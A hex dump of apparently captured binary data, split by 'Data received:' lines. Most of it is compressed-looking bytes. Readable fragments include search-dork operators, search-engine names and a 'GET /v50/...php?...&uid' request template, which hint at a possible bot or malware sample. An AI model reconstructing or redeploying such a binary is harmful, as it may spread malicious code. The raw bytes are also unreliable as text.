89ff ffff 8404 7c78 20b7 92a9 2d9f 767d    ......|x ...-.v}
1438 8613 1116 8c01 235d 0ffe 12a7 ff16    .8......#]......
ff7f 2d1b 0e0b f6c6 ed90 f44d f0c6 03c7    ..-........M....
1c0a c68b 0f09 e1e1 ffbf f4ff 6816 fd0e    ............h...
64be 66b8 4673 2a0d 095b 5b91 41f4 265f    d.f.Fs*..[[.A.&_
2014 b20c 8c10 ffff 16ff a17c f11c c9c8     ..........|....
f2b9 76b9 ece8 2183 b54b 2c13 c11c e83d    ..v...!..K,....=
dd93 ff5f faff 5c3d 54d4 6804 d0c8 888e    ..._..\=T.h.....
bfaf cf4f 04a8 5689 a9d7 34c9 d656 12cf    ...O..V...4..V..
e1b7 ffff 1833 080c 90b3 4693 6b10 8415    .....3....F.k...
e4ad 55c8 dc82 157e e110 5b2b 5fea ff7f    ..U....~..[+_...
2517 7300 2d20 ecb6 5a04 250c d510 562f    %.s.- ..Z.%...V/
588f 6d15 381f ffff ffff 3b3a 6a6d ac32    X.m.8.....;:jm.2
0179 c732 d7b7 a4eb 237f b435 8414 6c32    .y.2....#..5..l2
c849 0cb8 c025 7759 05c3 faff ffff 3a98    .I...%wY......:.
e11d 0f7f cd66 3329 15c3 2f15 6d8b 437e    .....f3)../.m.C~
8ee4 f88d 47f4 7f8a 07bb 26ff 85ff 1768    ....G.....&....h
4f47 7d10 2b2b ce0e 97dc 321d 7510 e764    OG}.++....2.u..d
3959 ba2d f852 ffff 08f4 fcfc 5fb3 4106    9Y.-.R......_.A.
f408 252d fc38 6b0b fcfc 3008 a1ff 7fa9    ..%-.8k...0.....
b7ba f55d 1fe8 cf05 a1b6 1b51 e188 95af    ...].......Q....
d5ea 9e9b fcff 7fe1 a915 dca3 feec 056a    ...............j
8cdc 8b65 ad48 3e20 c3ae 6eee 1885 4508    ...e.H> ..n...E.
f8ff 460b 0a9e 1f32 bf3d 8487 57ed a011    ..F....2.=..W...
745b d50d 2ef0 9798 03ce 51a1 eb6f a815    t[........Q..o..
459c ffff 5bff 4e50 df6b 6d07 d651 8210    E...[.NP.km..Q..
548d b266 6d16 87ff 095a 9ce4 3037 cb6a    T..fm....Z..07.j
ffdb ffff 9856 2b0b e4c2 2e1b fe57 6842    .....V+......WhB
401e f292 2bec 5ffe d7bb 119b 8081 7509    @...+._.......u.
7efb 7fe1 8021 2d0d 8240 2050 4662 f872    ~....!-..@ PFb.r
ebb0 f967 87cc e907 4dff 0bfd df20 7cdf    ...g....M.... |.
ef4d 853d a894 5005 4288 f33c cff3 8078    .M.=..P.B..<...x
706c ffff ffff 6460 6538 cf5c 58a9 db86    pl....d`e8.\X...
2456 d23c 3266 0c95 09e4 480c 0ce4 5a31    $V.<2f....H...Z1
2129 c7ae 15da abff 2ff0 1ad9 c317 e65d    !)....../......]
56b9 6490 cb5b f8f8 0c5f e314 2ff4 067f    V.d..[..._../...
4c04 7256 7aad 4541 dff7 7d00 c6fc ffb7    L.rVz.EA..}.....
faff 04f8 b970 c8af a4d3 d850 201b b43a    .....p.....P ..:
993b 844c 1d18 76d8 321f e1ff 6fff 8bdb    .;.L..v.2...o...
6a1c bf80 00b2 d626 66ad 2729 dc00 80a5    j......&f.')....
fb6c 29a8 09a4 7fab 257e eb3b 2202 06f1    .l).....%~.;"...
92b2 2153 6cf6 5de0 5fe8 06c0 00d2 2875    ..!Sl.]._.....(u
0dd3 32a8 51e8 12ff ffad 349b c37d b3de    ..2.Q.....4..}..
6fb4 5e65 ffc9 cfc0 501b eb73 d916 ffff    o.^e....P..s....
ff48 1307 3c0e 100d eb4b 589d afd4 3511    .H..<....KX...5.
b432 85b1 020d b214 6617 f8ff ff57 2e83    .2......f....W..
0370 051b 26e4 f345 3213 610c 19a6 b098    .p..&..E2.a.....
99c7 1d65 5fa0 c5ff f16a 4326 0c4d 1735    ...e_....jC&.M.5
2393 637f f40b 03b2 ffff 6fff 9c6c 37f8    #.c.......o..l7.
0808 f864 7c08 e701 1323 f435 0862 ad08    ...d|....#.5.b..
0309 389a e7b6 6de6 fdff 6ff4 b79c ad59    ..8...m...o....Y
c382 9e2e 46b9 e41a 8246 7e04 3409 3dcf    ....F....F~.4.=.
5534 17f8 ff5b 3cb4 55c9 b382 2be6 3521    U4...[<.U...+.5!
c245 f46c 6be0 f8d0 ff8d ff42 1a45 c777    .E.lk......B.E.w
dbea ebf8 da23 02a1 8db5 4ae7 cad9 ffff    .....#....J.....
ffff b2a7 e10c 1de2 9c05 6b2d 0144 41dc    ..........k-.DA.
0356 8e05 f2f8 8314 8778 a2f6 ff01 8a03    .V.......x......
7a08 dfea 97fe 8c74 d1c9 91e2 f0cc 4f35    z......t......O5
4935 1604 751e bcd8 dcfe ffff 9e97 933a    I5..u..........:
52e5 17c2 a835 019e bbb1 24da eb02 1a11    R....5....$.....
48e2 0029 2847 a5ad fe6f 4a29 be4e ad22    H..)(G...oJ).N."
b74a 9f2f 7776 e1d8 dce2 ffff da7e 1cce    .J./wv.......~..
67c8 8904 8a44 0eff 3cad c006 a50c d6f9    g....D..<.......
2bc3 f0ff ff6f 53e8 51eb d8b9 04e9 5480    +....oS.Q.....T.
da70 9cf4 5d54 b37c 7cd9 02b1 c1d8 17fa    .p..]T.||.......
ff2f 452a e71d a35d 225b 8043 a84c 5f5d    ./E*...]"[.C.L_]
bed3 3d0b 66a7 faff ffff 644b 6e1c f718    ..=.f.....dKn...
1f36 fad8 1ac0 fec0 20e3 b91c aa71 e96e    .6...... ....q.n
32c9 56dc 1880 38ff 7feb 9742 ec91 dc6e    2.V...8....B...n
482e fa16 919c 6a2f 4d6f 291c f56a 3a07    H.....j/Mo)..j:.
4bfc 6ffc 0359 0730 67df 8814 67d9 7d40    K.o..Y.0g...g.}@
d130 97ed 5910 ff02 bff0 123c 4221 9f08    .0..Y......<B!..
1343 8d95 fc6c 0043 6fbd 24bb e2bf d4ff    .C...l.Co.$.....
172b f984 4b15 2240 a938 e4ad 73fb ee8e    .+..K."@.8..s...
d29f e4eb ff56 5fd3 2e51 0654 03b1 603e    .....V_..Q.T..`>
5b34 4cec 3c71 6386 f6ff df6a 386f 3449    [4L.<qc....j8o4I
75dc 0ed6 d676 6cd8 ff06 02e4 ebcf 62ff    u....vl.......b.
46ff ff33 71db 517d 24c1 891d 145a 79c2    F..3q.Q}$....Zy.
05a9 1438 d8c3 3081 7cdc fe5b 17fe 8d3c    ...8..0.|..[...<
10ec c92b 41e1 9d61 24d0 7ced 10be 0103    ...+A..a$.|.....
c6ff 2dfe 2d6b cf01 1789 3098 4d41 0320    ..-.-k....0.MA. 
ff28 1014 0376 ffdf 5ef8 99cc 1cc4 5607    .(...v..^.....V.
e4fb 1cf2 2432 1c10 4290 0319 10a0 e310    ....$2..B.......
ffff ffff 0596 4d0c 2e31 d94b 8eec ba32    ......M..1.K...2
905c fc2d                                  .\.-
Data received: 
    
43a6 ec39 5cf4 0293 80a9 3e18 e27d cc00    C..9\.....>..}..
7fab ffff 08fa 2abb 40e1 86f8 bb5f 6000    ......*.@...._`.
0c1f cb68 9417 c447 cdf8 9d1a ad02 ffff    ...h...G........
4490 156a 049c 112b 82f1 5bec 5c12 bde2    D..j...+..[.\...
61f6 b728 71a1 037b 16cd c308 85c9 ffff    a..(q..{........
ffff 4d05 f1ba 607a 372c d60f 8316 f60e    ..M...`z7,......
d800 a326 6936 77d4 bf57 a320 9701 6dc7    ...&i6w..W. ..m.
1396 b7f8 ff16 5bb2 8abd 1a13 d4ec 119e    ......[.........
7d9f c490 7fe7 fddf e0ff 7578 8bff 058d    }.........ux....
16fc 7629 c1da 03c1 0f23 cba2 8d42 7df9    ..v).....#...B}.
ff97 f84b 3605 2f70 7714 ffba 555c d898    ...K6./pw...U\..
05ad c244 9300 ffff 6fff 51d0 6cc2 cbd3    ...D....o.Q.l...
5c74 7e31 96a5 9eef 0316 d574 3622 c1cc    \t~1.......t6"..
0d12 2559 8e09 2fb1 d4ff 2e3c cc7e 7f5e    ..%Y../....<.~.^
566a 7be9 1985 048d 432b dff8 adc0 64f8    Vj{.....C+....d.
28ba c987 0121 9f07 4d38 60d5 ffff ff1b    (....!..M8`.....
a575 491a 2f8b 45b8 8974 0a9f 8ae9 57e4    .uI./.E..t....W.
c937 2918 b967 18c9 81de ff2f d5ea 5cc2    .7)..g...../..\.
08e4 7b6a ff8a 6ee8 37e1 200c df62 f42f    ..{j..n.7. ..b./
7c8b ba56 83ce 90a2 b616 d2d6 e856 8771    |..V.........V.q
fda5 ff2f c73d 40e2 7435 6c42 4e56 7599    .../.=@.t5lBNVu.
560a 188c 4f52 bddc ffff 372a d9cb 45e2    V...OR....7*..E.
9185 601b 0723 02ac 9809 af09 f915 9394    ..`..#..........
ff4b 6dfd 7604 f946 d335 a525 6e01 ea56    .Km.v..F.5.%n..V
48f6 350f 27c8 bec5 7fa9 359f b93b 6a68    H.5.'.....5..;jh
2504 2d2f 3f0b 5c76 56a1 ffff 97ce 3207    %.-/?.\vV.....2.
57ad d41d 7cb3 811d efc4 bdfa 402e 4b60    W...|.......@.K`
ec4f ea85 ff7f 4a06 4006 a898 c58c cf14    .O....J.@.......
d5a9 8886 52bb ec5f 3bff ffff 5f1a 930d    ....R.._;..._...
e412 7b6c 3d60 a1e4 4b24 9b54 0c5d 3616    ..{l=`..K$.T.]6.
48ac 674c 274b c865 cb63 2ff5 8dff 1744    H.gL'K.e.c/....D
d158 e62b 85de d4ff 9f4d 5562 3722 f385    .X.+.....MUb7"..
ffff 7ffb c09d be4b 3607 390a 785e 5872    .......K6.9.x^Xr
249d 234c d6fa 9c34 271d dad9 fa57 ff07    $.#L...4'....W..
17fe 5bff 4632 d237 5727 a7ed d0dd 5f57    ..[.F2.7W'...._W
570b 80e1 4bc0 640d fdb7 bfc5 9086 1b2d    W...K.d........-
c1ac a00d 011b b003 9c0c 569d 0340 fbbf    ..........V..@..
c50b 37c2 38d1 b29e 0118 89df d3d5 e4e5    ..7.8...........
2407 feff df7a ac62 c364 6910 fddb 080e    $....z.b.di.....
89d6 92a7 e2d6 dede e259 f359 a4fe 1bfc    .........Y.Y....
b7d7 72e2 1d74 4a8d a165 6b53 a63b 8313    ..r..tJ..ekS.;..
255e 63b7 faff ad5e ef87 60d0 4411 d8ec    %^c....^..`.D...
6097 d0a0 8383 52f2 ff2f 7d89 fd5a ceee    `.....R../}..Z..
fe7d a180 a405 e932 00eb 7172 a422 ffff    .}.....2..qr."..
ffff 590e 39ac 4807 68c2 19b9 0ae5 106a    ..Y.9.H.h......j
815f 1233 ff26 272d c831 6a84 97a3 f375    ._.3.&'-.1j....u
0608 fbff ffff 6865 5cc6 3881 5068 9837    ......he\.8.Ph.7
8425 c5f4 bb60 c2b6 62eb 0167 2856 19b1    .%...`..b..g(V..
e780 0e11 ff5f f87f 18a3 ad76 d96e c953    ....._.....v.n.S
153b c15d 7bc9 5a0d b024 5c22 5a61 ef52    .;.]{.Z..$\"Za.R
ffff ffff 450b c8eb 2439 0bc9 495a 55e0    ....E...$9..IZU.
89c4 8d92 17d9 6456 b80c f6b0 21f9 e875    ......dV....!..u
6e11 d424 b7fa 7fab 72ac 1e1c 5972 7bb2    n..$....r...Yr{.
0b38 531e 6873 403f 1782 d2ff 9227 933c    .8S.hs@?.....'.<
55d8 1255 d002 10ca 3ca9 ffb7 faff 8583    U..U....<.......
8de8 ebc1 5326 207d 2e3d 186f e401 2685    ....S& }.=.o..&.
6d31 8977 80e4 ffd6 fff6 507e 9e3c 68c7    m1.w......P~.<h.
3de3 be56 04fa 3469 4dd7 c010 8716 5dd8    =..V..4iM.....].
0dfc 02ff 3327 21f5 eb9a cbde c2a5 6b0c    ....3'!.......k.
3202 c761 dbff 2dfe b3d9 1d36 af31 70ea    2..a..-....6.1p.
68f0 3450 a109 74b1 6370 670f 7f89 b7ff    h.4P..t.cpg.....
415d af03 1d90 4b3e ae30 a875 7a79 c891    A]....K>.0.uzy..
c788 07c0 ffff 8dfe 0a23 6c1b b257 aebe    .........#l..W..
1a48 ef13 6280 7d37 53b0 bb5b 747a fb74    .H..b.}7S..[tz.t
14fa 0bfd 758d a070 ff68 6a26 f134 8ccd    ....u..p.hj&.4..
295f 1bfc ff6f 169b 3486 6501 877a 5d8a    )_...o..4.e..z].
8d2a 447b 0062 67f8 166e 85fe ffff c851    .*D{.bg..n.....Q
996a 8d7a a474 0315 3502 649d e0a1 551c    .j.z.t..5.d...U.
5027 9e12 80ff a5ff c6ff 986a 5050 cdae    P'.........jPP..
29ce 68dc ff07 7868 2f62 1716 bf8e adc2    ).h...xh/b......
ffff bf36 0b77 179c 899d 7c0c c82b ffe2    ...6.w....|..+..
c862 cbbf 4585 ffff ffff e406 30e5 1c78    .b..E.......0..x
fabd 2bb7 a65a 9744 1201 fc7a 3905 7d07    ..+..Z.D...z9.}.
58dc 0ab6 2b04 53ce 5357 a5fe ff12 1ff6    X...+.S.SW......
780e 3bc3 c482 1774 cf96 b5d9 3d3a 5fea    x.;....t....=:_.
ffff 8ea5 1bd7 3a30 3e45 750f a388 1d56    ......:0>Eu....V
d0b1 d836 5cea e251 29cd ffff ffff da01    ...6\..Q).......
5bb0 88bc 02e3 0755 70d7 1ee8 167d b406    [......Up....}..
687c b00b 1209 be86 d95c 2564 8992 ffff    h|.......\%d....
ffff e41c 6021 421c 8b30 f0e0 0d9c 8a4d    ....`!B..0.....M
ba24 5413 6735 5060 488d 203c 3063 a96c    .$T.g5P`H. <0c.l
b625 6cf0 a5ff 0a1a 2b6c b33f 3064 c1ce    .%l.....+l.?0d..
16d8 2881 306a bfc4 ff6f 5804 734b 2b43    ..(.0j...oX.sK+C
8291 e0f9 add2 cb4c b34b 574b 08e1 1b6d    .......L.KWK...m
f485 f0b3 1cf9 8f08 957d 84d1 ffbf c4c2    .........}......
03fb 862b b9f7 0e5d f025 1ba8 3b6e fa30    ...+...].%..;n.0
18f9 df7e a9ff e301 592d 28b8 83dc 89d8    ...~....Y-(.....
fa04 c338 87a8 f02a 1440 f8ff ffff 3203    ...8...*.@....2.
460b 4b78 1b81 ce33 cba1 f737 c008 c403    F.Kx...3...7....
a03b f87d 092b c753 e63b 12ff ffff 971c    .;.}.+.S.;......
ebe2 53bc ad8f 51c8 9562 a967 8fc0 684d    ..S...Q..b.g..hM
9f74 c4c2                                  .t..
Data received: 
    
6586 dcdc eb22 e8ff ffff e23d 2261 0e95    e....".....="a..
3102 498d 0cea a826 4a95 27ce 02a9 c424    1.I....&J.'....$
5372 12c0 56ff ffff dfb1 49e7 aa17 0dc4    Sr..V.....I.....
eb6b 2880 51d8 f780 5e42 563c 6731 ccf0    .k(.Q...^BV<g1..
542b df78 3ba7 d2ff dffe 0a96 92fb b1f5    T+.x;...........
0d3d 04c2 0f4d fc7c c1c2 0cb2 f681 ecc4    .=...M.|........
6c97 fa8d ffac 2e35 1b4c 3057 5e31 3a86    l......5.L0W^1:.
446c e025 6750 eaff ff1b 092f d116 da83    Dl.%gP...../....
1f8c e874 4ec7 f3ed 692b 1761 2b68 b4fa    ...tN...i+.a+h..
c6ff df21 723b 2ad2 f301 8939 d8ab 0025    ...!r;*....9...%
a25c eedc cb03 1cff c6ff 177f 8344 b4d8    .\...........D..
4c53 da3a 1824 a205 6618 1db1 f245 222f    LS.:.$..f....E"/
f146 ffff 3b7a a866 6c2b 60a5 f305 2974    .F..;z.fl+`...)t
db00 9f90 0deb d3c7 ffff d62f a619 2acd    .........../..*.
3ce4 ac94 3c98 7867 0750 9682 ecff 1017    <...<.xg.P......
adfa 7feb ffff a2b1 3c6e b874 a798 e0d2    ........<n.t....
19ed d810 5dd4 530b de68 7a2a 5498 897b    ....].S..hz*T..{
7fe3 0bff 042e 56fc a935 dc06 8775 c0d6    ......V..5...u..
2de9 13e8 aa4d ad1f f142 b7fa 6c0f 9150    -....M...B..l..P
87a0 1a90 0b57 9c10 dd28 fcbf be0d 283d    .....W...(....(=
8378 6c2a 065e 701e 5399 1d40 edff ff0b    .xl*.^p.S..@....
2f33 2f1c b6e2 e73e 103d b79e 102e fa88    /3/....>.=......
647c 0f21 1ae4 850a 1dfa 985e 6c04 6869    d|.!.......^l.hi
6562 ffff 6f1b a10b 094c 4844 d868 5e30    eb..o....LHD.h^0
80a3 0612 2a6e b33d 7883 c7fc d57f e3ff    ....*n.=x.......
bf01 491c 04a3 973d 0a9d 27c5 8330 bb6d    ..I....=..'..0.m
38dc e118 d077 ffbf 5376 1326 dfa6 6212    8....w..Sv.&..b.
7daa 5024 2818 427c 0410 0c08 ffff ffbf    }.P$(.B|........
6dbe b0e7 d95d fcf8 f488 5dcc 50ef fb8b    m....]....].P...
cd85 5510 c86a 2006 c404 610d 75be 3736    ..U..j ...a.u.76
feff c021 acd1 fca2 35d8 64a6 143f a8a0    ...!....5.d..?..
e0f2 0577 25a0 bfc4 ffff c984 ba63 db9c    ...w%........c..
e0f4 1914 bf0d 98e5 c4c3 8877 b51f 075d    ...........w...]
94b6 522f f4ff 1ed1 7205 8a1b 884f beaf    ..R/....r....O..
7d11 e58c 0c06 dbfa 6ffd ff80 2b5c f619    }.......o...+\..
d207 7c73 68e2 93d0 5711 5b3c b664 3d82    ..|sh...W.[<.d=.
5f37 f8ff 977a ec03 f478 6024 7d18 0bc2    _7...z...x`$}...
ec15 8e4d 94ab c103 ffc6 ff1b 79ff d02c    ...M........y..,
33f6 6046 fbd1 7605 aa06 1e03 add6 46f3    3.`F..v.......F.
ffff ffff e80d 1c4c bd52 f7ad 0ed5 29ac    .......L.R....).
d012 7423 0510 0b60 939d b916 3fec 09f4    ..t#...`....?...
2cf5 d8a1 ffd6 dfe0 edeb d17e 5715 f05f    ,..........~W.._
5b6f 8748 e420 5ec9 c353 ff7f a1ff d557    [o.H. ^..S.....W
8b5e b501 bd6e 5e75 04ac cfab d7eb 8336    .^...n^u.......6
c710 ebed c906 7f8b c6ff 27da 8a65 bb89    ..........'..e..
4604 0208 3f0f 7dba 5d08 2404 ff7f fbff    F...?.}.].$.....
2aff 710c 2fb0 6d1a f43e a3ab 8b10 4f5d    *.q./.m..>....O]
2314 2dde 4f08 3bc7 6318 cb05 c62f 758b    #.-.O.;.c..../u.
ae3c ecbd a9ff f6ee 831d 2aff ffff ffc3    .<........*.....
1039 7d0c 75e0 2647 0c3b e773 05e2 df74    .9}.u.&G.;.s...t
1478 5120 5407 d19a 7b1d 521d 9ab0 ffff    .xQ T...{.R.....
ff4b d348 c508 db0c af1c e982 52ed b28b    .K.H........R...
b5d0 c72c 780b be30 cf8b 4e04 ed6d a9ff    ...,x..0..N..m..
5e0b 8bc3 e61b ba6d 7142 6b8a 7504 c1e0    ^......mqBk.u...
ffff 25fe 8568 3ffd d9c1 fbbb c346 fc7d    ..%..h?......F.}
02ce 9a67 aac6 a450 c88f 23b1 5bfd 6ff4    ...g...P..#.[.o.
c7a2 4b50 ce12 53bf 31f3 1696 e860 62e9    ..KP..S.1....`b.
ffdf e8ff 5385 0614 cd5c 45ab b2f0 1b13    ....S....\E.....
73bf 17ff 4df8 75ef b286 c7e7 ffff 85fe    s...M.u.........
60a8 dbad 0cf0 cbc6 741b f4b6 3298 6b0e    `.......t...2.k.
2d48 0811 10da 6e6b b7ff ffff 08cc e8b2    -H....nk........
0870 3bd8 2276 6ed2 e06b 6bcb 507d 75ee    .p;."vn..kk.P}u.
ee0b c510 6e8c 55f4 ff5b ffff 59d0 ba9d    ....n.U..[..Y...
a17d 5ac2 c476 c7c0 ebf3 08ba 54c7 dd03    .}Z..v......T...
c789 561c 94e9 ff4b 5bfd 67ec b727 a1db    ..V....K[.g..'..
7af9 6631 628b 2355 fcc0 76eb 251a ffff    z.f1b.#U..v.%...
363b d3dd 8dce 741e 9ef8 9a66 b048 b799    6;....t....f.H..
2de1 dfba d0ff 9ad8 60b2 4e08 80d9 fee1    -.......`.N.....
c87e c11a 2bfa a0f0 ffff ffff 4f75 f18b    .~..+.......Ou..
d5e1 57c1 10e2 ae78 31e9 dcbe 9fb1 0910    ..W....x1.......
ca58 df75 e592 e636 347e 1737 ffff ff56    .X.u...64~.7...V
9f9a c1e7 3ab1 fb2b 2ddb b1d0 04ec f866    ....:..+-......f
1757 8377 789b a37f fd5f ead2 6913 1d4d    .W.wx...._..i..M
2533 07e3 3bd7 3983 ef1d eb59 37fe ff6f    %3..;.9....Y7..o
b9de c243 8a2c 3b7d 28e3 2b90 7505 ea8d    ...C.,;}(.+.u...
da38 2b58 6640 ffff dfe2 852e 2695 e115    .8+Xf@......&...
825c 88cc 360e a2d1 c481 0294 c1a6 2549    .\..6.........%I
c5a6 fdff ffff e252 d08a 07d2 4088 261b    .......R....@.&.
795f bf1e 4f50 4790 c3f1 4cd7 4e03 8f99    y_..OPG...L.N...
0e23 c859 ffff ff2f 6660 2ac4 8fe6 1815    .#.Y.../f`*.....
4b34 20b9 6d01 fa45 3179 42f7 0059 041d    K4 .m..E1yB..Y..
8bed b648 6ce8 2ff4 1125 30bc b80b b8cc    ...Hl./..%0.....
dfff 8b2b 3da2 2ff5 2005 3a0b 2d0b 8b78    ...+=./. .:.-..x
04f4 4a01 adff 1773 47c8 d9c6 c2db 8b6e    ..J....sG......n
35f5 2ff5 2d66 c8c3 3f1a 86d8 8805 808b    5./.-f..?.......
4435 faff ffbf 4e57 f0be 8b24 3c7e 2eff    D5....NW...$<~..
0d07 d7ea bf4b d070 328b 09c1 6040 753f    .....K.p2...`@u?
68ff ff25 dec9 02f4 3c3c a3b2 0678 3fc6    h..%....<<...x?.
6466 8320 00a1 0d6b 22f6 5fe8 7fd3 fbbe    df. ...k"._.....
771c 48cb 26ff 55af 2bd6 ddfe 3d63 3926    w.H.&.U.+...=c9&
fa17 f8ff 8a30 5eca f4df 6a21 6f71 fc3b    .....0^...j!oq.;
f00f 8b0e                                  ....
Data received: 
    
8833 a21f 5bff dbff 5f09 1e83 ee04 ebea    .3..[..._.......
7165 9ac5 df83 2511 b35e 43d2 1bd5 5098    qe....%..^C...P.
3242 fcff add5 8010 f72c 8908 538e eb26    2B.......,..S..&
2c01 7405 da11 7d6f 8ddf ea6f d775 2245    ,.t...}o...o.u"E
4405 572d 0ea6 5b9e d0e4 8512 ffff 4b90    D.W-..[.......K.
73b8 6763 b04e 0f2b 3933 ea4c 6fb0 6886    s.gc.N.+93.Lo.h.
e9ff 97fe 8823 f646 b650 0780 7526 3403    .....#.F.P..u&4.
21df 7d7f ed15 39ec 7499 7ffb 2f75 08b7    !.}...9.t.../u..
e711 2641 364d 7805 2300 9f74 4128 2420    ..&A6Mx.#..tA($ 
b5ba fcff 1cfc 467e 2318 2941 14fc 3541    ......F~#.)A..5A
0019 f941 c6fc 5f62 b755 1809 102c e531    ...A.._b.U...,.1
534b 46ff 640e 1231 19e9 ffc2 4b6c 5008    SKF.d..1....KlP.
83f8 0b20 7248 d7dc c941 78e9 f7df 162a    ... rH...Ax....*
75ec ec41 741f 7b30 465c ceff 7fa9 ff3f    u..At.{0F\.....?
45e0 01b6 3543 be33 5916 c32b e020 836c    E...5C.3Y..+. .l
bb90 0808 7607 a017 5eda feb0 c92e 32c8    ....v...^.....2.
c0d0 ce10 8fdc b25f 78d0 11ff ff7f fb24    ......._x......$
874c 961a 18a6 6c92 2f53 58c4 2f90 1e30    .L....l./SX./..0
92c3 4180 6d96 225f c814 4d56 fdff ffb8    ..A.m."_..MV....
9fd4 6db0 df8c cae8 4318 1308 1661 2367    ..m.....C....a#g
9ff0 4159 17d6 feff edff ff3f 5441 6116    ..AY.......?TAa.
0cd3 afcd 418a 3e00 c04f f38f 7cfe c9e2    ....A.>..O..|...
6e01 df02 f6c2 7fab f246 2005 9319 0300    n........F .....
dce7 f241 982b ffed ffff 0b34 a027 dfc9    ...A.+.....4.'..
ee07 a901 b537 02d0 4bce 0e24 182f d5cf    .....7..K..$./..
2003 c942 000b 5bfc fff5 ec05 775e 2127     ..B..[.....w^!'
3035 1807 3b79 f2cc 01c4 30ff ffff c603    05..;y....0.....
384f 81e4 e408 784c cf0e 7272 5500 5e67    8O....xL..rrU.^g
025f 7002 c8c9 9327 79b6 bd55 e105 8206    ._p....'y..U....
ab0a 0cd8 a04c e4f9 ffff 97f8 4eb2 bb03    .....L......N...
0df2 9c1c e4cd d903 d901 066c 2039 4338    ...........l 9C8
ec27 60ff ffad f022 04b8 4259 c6ad 0207    .'`...."..BY....
69ba 911f 51bc 7417 b803 b4ac 90bf bdd1    i...Q.t.........
42f0 8048 907c 0614 6670 6013 50bf 04b7    B..H.|..fp`.P...
12be 0906 e9fd 0c04 354d d3fe 37f8 ffdc    ........5M..7...
0350 f8ec e4dc d49a a66b 9e1b 2fc8 07c4    .P.......k../...
c0bc 0ef2 bf69 edff ffdf 373f 7175 6572    .....i....7?quer
793d 0026 3f70 fded 35e7 0b03 1713 0349    y=.&?p..5......I
4759 60ff 17fa ff53 fbbb 7fbe 4974 626e    GY`....S....Itbn
3a63 6163 ff09 696e 7465 7874 3a07 f7fe    :cac..intext:...
ffff ffb6 8ffd 6974 6c65 1b72 656c 6115    ......itle.rela.
640b 17b0 f75b 7775 726c 0977 002e 6173    d....[wurl.w..as
6b2e 7feb ff17 4c56 6eed df13 7365 6172    k.....LVn...sear
4911 6f6c ad7d c006 1b6c 69fe ffff d276    I.ol.}...li....v
65b5 923c 6023 3f6d 736e 5bf2 07f6 0b3f    e..<`#?msn[....?
7961 686f 6f0f 98bb ffff ff85 9a7f 670a    yahoo.........g.
676c 4e07 ffff ad7b 7a72 bf7a 0348 5454    glN....{zr.z.HTT
502f 312e 3125 e87f e920 3430 654e 6f0d    P/1.1%... 40eNo.
ecd8 f6b7 0a01 3ef6 4bfd ff2d 646e 046d    ......>.K..-dn.m
4b2e 6353 dc95 ed76 7702 6574 e86e 1f96    K.cS...vw.et.n..
feff adfe 72b9 cbad b072 d36c 4149 6e17    ....r....r.lAIn.
97db edb7 1c43 276b 5558 6dfb ff0d 2917    .....C'kUXm...).
7069 6c77 db76 e5ee 6100 5528 c670 877f    pilw.v..a.U(.p..
a9ff ff45 0565 2ff8 036e 9d62 00bc 6965    ...E.e/..n.b..ie
f155 2d25 ee6e 7741 2165 73ff ff5f e04e    .U-%.nwA!es.._.N
6953 f67b ddf2 b763 7b2d 6300 6b73 3a6f    iS.{...c{-c.ks:o
9173 7217 db22 b4ff 85fe c6ad 6b69 0a73    .sr.."......ki.s
7f2d 6107 f042 8d32 3a0b 3172 6e44 ffa5    .-a..B.2:.1rnD..
fef6 becd 7554 7031 66aa 653b 52e1 ff6b    ....uTp1f.e;R..k
b7a9 ffff 2f15 033d 4745 5420 2f76 3530    ..../..=GET /v50
2f2c ed85 8e07 7068 700a 0c83 bffd 7f64    /,....php......d
2673 06d0 6dcb ff63 2676 3dbf 2675 6964    &s..m..c&v=.&uid
6c11 24ff ffff 7f20 6ebc db86 29bd 558b    l.$.... n...).U.
2d41 6765 0a3a 20cd 0df6 d618 0f48 6f73    -Age.: ......Hos
0952 5e6b 9dff ffff ff7b 7fb3 720c e600    .R^k.....{..r...
3536 6b87 8166 b7ae f1dc 733f e258 37ea    56k..f....s?.X7.
6c06 723d f6dd ef6e 09ff 1bfd ff6e 6719    l.r=...n.....ng.
653d 6f6e 266e 2364 6f77 3dd6 db0b 5f23    e=on&n#dow=..._#
95b5 7418 255f f8ff ff33 4103 325c 6bb1    ..t.%_...3A.2\k.
9146 7388 0486 5bc3 18ae e1c1 a725 5c83    .Fs...[......%\.
70d8 dafa 6ffc ff73 673d 615f 99c4 61f7    p...o..sg=a_..a.
63ef dcd0 aca2 3d68 74bf 0f61 86e6 ffff    c.....=ht..a....
ffdf 8b6c 7570 2200 2283 6722 0a1c a1dd    ...lup".".g"....
3eb8 0d03 cf74 2d03 6f64 372f c2cf 7cff    >....t-.od7/..|.
bf70 abf9 3f70 6e0d 67cb 0d00 374b d89e    .p..?pn.g...7K..
0b73 e71a 65ff ff5b ff16 375a 437b 1b34    .s..e..[..7ZC{.4
4e27 f770 78ef feee 863f d162 6d74 c875    N'.px....?.bmt.u
3d2f 266b fbff b761 dc5b 3d64 656d dbba    =/&k...a.[=dem..
426b 0696 9c16 6785 b387 0cf8 ffff 7f9b    Bk....g.........
0331 3505 4944 6f1d b5ad b965 e06a df8a    .15.IDo....e.j..
670c b92d 3c3e 6b66 5f18 0bff ffdf 44f3    g..-<>kf_.....D.
5f73 0ccf d018 6f86 3313 450a 8fe8 c61b    _s....o.3.E.....
7303 4769 b9ff ffff ffd9 afdc 0522 75df    s.Gi........."u.
2267 089f b3d7 4cce 9e9f 9804 65b7 c3f6    "g....L.....e...
de7b d233 6a07 bc20 2bdf fd17 f8ac a1b9    .{.3j.. +.......
8de7 6e63 1074 0a6e 7ced dbf7 6e66 05c5    ..nc.t.n|...nf..
79bf d5ff 4636 796b 9b5b 6a52 1e5c 0cc2    y...F6yk.[jR.\..
a357 ad43 d3f1 ffff ff9f 4062 6c00 236e    .W.C......@bl.#n
ce44 ade9 7178 735c eb49 63d0 ce31 f648    .D..qxs\.Ic..1.H
4f20 636c 07fc ff25 6e7b 12d2 d162 2031    O cl...%n{...b 1
6313 7925 074c add4 0a74 4985 ffff 4b45    c.y%.L...tI...KE
b4b3 bef4                                  ....
Data received: 
    
9771 676d 613a 932d 3946 e155 6a7f b8fd    .qgma:.-9F.Uj...
dffe ffdd 05e7 9c6b ee3a 2faf 90ae 91af    .......k.:/.....
93ad 883e 0b33 b097 6db1 8f8d 5c25 feff    ...>.3..m...\%..
5be5 6769 6647 2767 2f6b 6ed9 75ca 3fa4    [.gifG'g/kn.u.?.
2f61 32ff ffff 42cc 63a1 c042 ea3d 12ca    /a2...B.c..B.=..
67f5 82f5 625f ae6e 9b0e 7ca5 a642 b037    g...b_.n..|..B.7
